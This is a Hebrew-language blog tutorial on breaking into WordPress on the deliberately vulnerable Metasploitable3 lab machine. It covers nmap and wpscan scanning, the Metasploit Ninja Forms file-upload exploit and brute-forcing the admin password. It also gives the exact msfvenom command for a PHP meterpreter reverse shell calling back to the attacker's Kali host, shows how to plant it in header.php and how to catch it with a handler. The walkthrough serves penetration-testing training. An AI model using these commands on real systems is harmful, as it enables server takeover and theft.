Home Metasploitable3 מציאת ופריצת WordPress ב Metasploitable3

מציאת ופריצת WordPress ב Metasploitable3

0 comment
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

מציאת ופריצת WordPress ב Metasploitable3

במאמר זה נראה כיצד לאתר את שרת ה WordPress ולנסות לבצע איתור של שמות המשתמשים והסיסמאות של האתר

נוסף על כך נבצע במאמר זה 2 Exploits האחד דרך גילוי של NMAP והשני דרך האתר עצמו של WordPress במונח שנקרא

PHP Exploitation

בסריקה של NMAP מצאנו שמאחורי פורט 8585 נמצא שרת Apache, זאת אומרת שקיים שירות Web בפורט 80 והוא IIS

כאשר ניגשים לפורט IIS פורט 80 מגיעים לאתר דוגמה של IIS

ואילו אם ניגשים לפורט 8585 מגיעים לאתר אחר

נבצע סריקה נוספת על הפורט הזה ספציפי על ידי הפוקדה

sudo nmap -p 8585 -sS -sV -sC --reason --open -v 192.168.31.228

התוצאה

ניתן להבחין שזהו שרת XAMP שגם לו אפשר לחפש חולשות אבטחה, אבל נמשיך הלאה

באתר עצמו, רשום הפרוייקטים שלי, למטה

אחד מהם הוא WordPress (ניתן הלשתמש ב DirBuster למציאת אתר WordPress אם קיים גם אם לא היה קישור)

נכנס אל האתר

כעת נסתכל על הקישור, ונוכל לראות שהנתיב לאתר הוא

http://192.168.31.225:8585/wordpress

ננסה להקיש את אחת מהאפשרויות הבאות

*אפשרויות אלו למי שמכיר WordPress הם למעשה דפי ההתחברות

*אני ממליץ ללמוד גם את שאר הפלטפורמות כמו Joomla, Durpal וכו'

ננסה להזין

http://192.168.31.225:8585/wordpress/wp-admin

נקבל שגיאה שלא קיים דף כזה ( יש אתרים שמגינים על פאנל ההתחברות ומעלימים את ה wp-admin ולכן אפשר לנסות את wp-login)

ננסה

http://192.168.31.225:8585/wordpress/wp-login.php

נוכל להבחין שהגענו לפאנל ההתחברות, מצויין!

נפתח טרמינל חדש ונעדכן את wpscan

הסבר על Wpscan אפשר למצוא במאמר

שימוש ב Wpscan לבדיקת פגיעויות ב WordPress וביצוע Brute Force

נקיש את הפקודה

wpscan --update

נבצע סריקת תחילה לאתר

wpscan --url http://192.168.31.225:8585/wordpress/

ונקבל הרבה בעיות אבטחה באתר,בעיה אחת למשל היא

Upload Directory has Directory listing enabled

וקישור לפני שאתם לוחצים על הקישור, אפשרות זו אומרת שניתן ל"דפדף" בתיקית ה Upload של האתר ולחפש חומר "מעניין"

לאחר שלחצתם תוכלו לראות שיש תיקייה 2016, לחצו עליה

ניתן להבחין שיש תמונות, באתרים אחרים יכול להיות תמונות \ קבצים שלא פורסמו למשתמשים ולהוריד \ לצפות במידע

אחת החולשות שניתן למצוא ברשימה זה

WordPress Ninja Forms Unauthenticated File Upload

נבצע חיפוש באינטרנט ונוכל להבחין שזהו Exploit ובעיית אבטחה ידועה

מצויין, זה Exploit? נפעיל את Metasploit

sudo msfconsole

נוכל להשתמש בחיפוש

search wp_ninja_forms

או לבצע חיפוש יותר מדוייק

grep ninja search exploit

זה יחפש לנו את המילה ninja רק בתחום ה exploit וכך נוודא שזה התוצאה

נעתיק את הנתיב של המיקום של ה exploit ונשתמש בו

use exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

נרשום show options

כה סעיפים חשובים פה:

*שאר הסעיפים אתם מכירים

form_path – הנתיב באתר בו נמצא החיפוש של אותו תוסף של חברת Ninja

targeturi – הנתיב לאתר הוורדפרס

rport – הפורט בכדי להגיע לאתר

נתחיל להזין את המידע

set rhosts 192.168.31.228
set rport 8585
set targeturi /wordpress
set form_path /index.php/king-of-hearts

הExploit ישלים את הנתיב לפי הנתונים ל (זו לא פקודה, אני רק מציג למה הוא ישלים)

192.168.31.225:8585/wordpress/index.php/king-of-hearts

ונריץ Exploit

וקיבלנו Meterpreter 🙂

שיטה אחרת להשגת Meterpreter ושליטה בשרת ובאתר

על ידי PHP Exploit

WordPress Users & Password Scan

כעת ננסה לסרוק את שמות המשתמשים של המערכת

wpscan --url 192.168.31.225:8585/wordpress/ --enumerate u

בסיום הסריקה נקבל את שמות המשתמשים של האתר

נסו BruteForce על ידי הפקודה

wpscan –url www.test.local --wordlist passwords.txt --username admin

את המשתמשים אתם יודעים ובשרת הזה אין הרבה לכן בצעו סריקה של סיסמאות רבות כל פעם אל מול משתמש אחד

רמז: התחילו מ vagrant

*קובץ הסיסמאות חייב לשבת באותו הנתיב בו אתם נמצאים

אם לא הצלחתם, סמנו את כל השורה סיסמא (הסיסמא בצבע לבן)

סיסמא: vagrant

אנחנו בתוך פאנל הניהול של WordPress

אבל למה להסתפק רק באתר הזה? האם זה שרת שמאחסן אתרים? מצויין נגיע גם אליהם!

כיצד? נשתמש ב PHP Exploit

נקיש את הפקודה

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.31.162 lport=5555 -f raw > shell.php

192.168.31.162 – זה הכתובת של שרת ה KALI שלכם

נמתין ליצירת קובץ ה PHP

נפתח אותו ונסמן את כל הכתוב בו ונעתיק את התוכן ב Ctrl + C

כעת באתר הוורדפרס בפאנל הניהול נלחץ על הנתיב בצד שמאל

Appearances -> Editor

כעת בצד ימין לחצו על Header.php

לחצו כמה אנטרים להוריד את כל המלל קצת למטה

והוסיפו בשורה העליונה

?>

צריך להראות כך:

כעת מחקו את ממש בהתחלה מצד שמאל

*/

שיהיה כך:

נחזור ל KALI וכעת נכנס ל Metapsloit

sudo msfconsole

נפעיל Handler שימתין לחיבור בצד השני

use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.31.162
set lport 5555
exploit

הבחינו שהכתובת IP היא של הKALI

הבחינו שהפורט 5555 הוא זה שהוזן כאשר יצרנו את ה PHP Exploit

שמרו את הקובץ, וכנסו לאתר

 

http://192.168.31.225:8585/wordpress/

ברגע שנכנסנו אל האתר , נטען אחד מדפי ה PHP הראשיים באתר שהוא Header.php ובו הכנסנו "Payload"

כעת נחזור ל Kali ונוכל להבחין שהצלנו לקבל Meterpreter!!!

 

מאמרים קשורים

Leave a Comment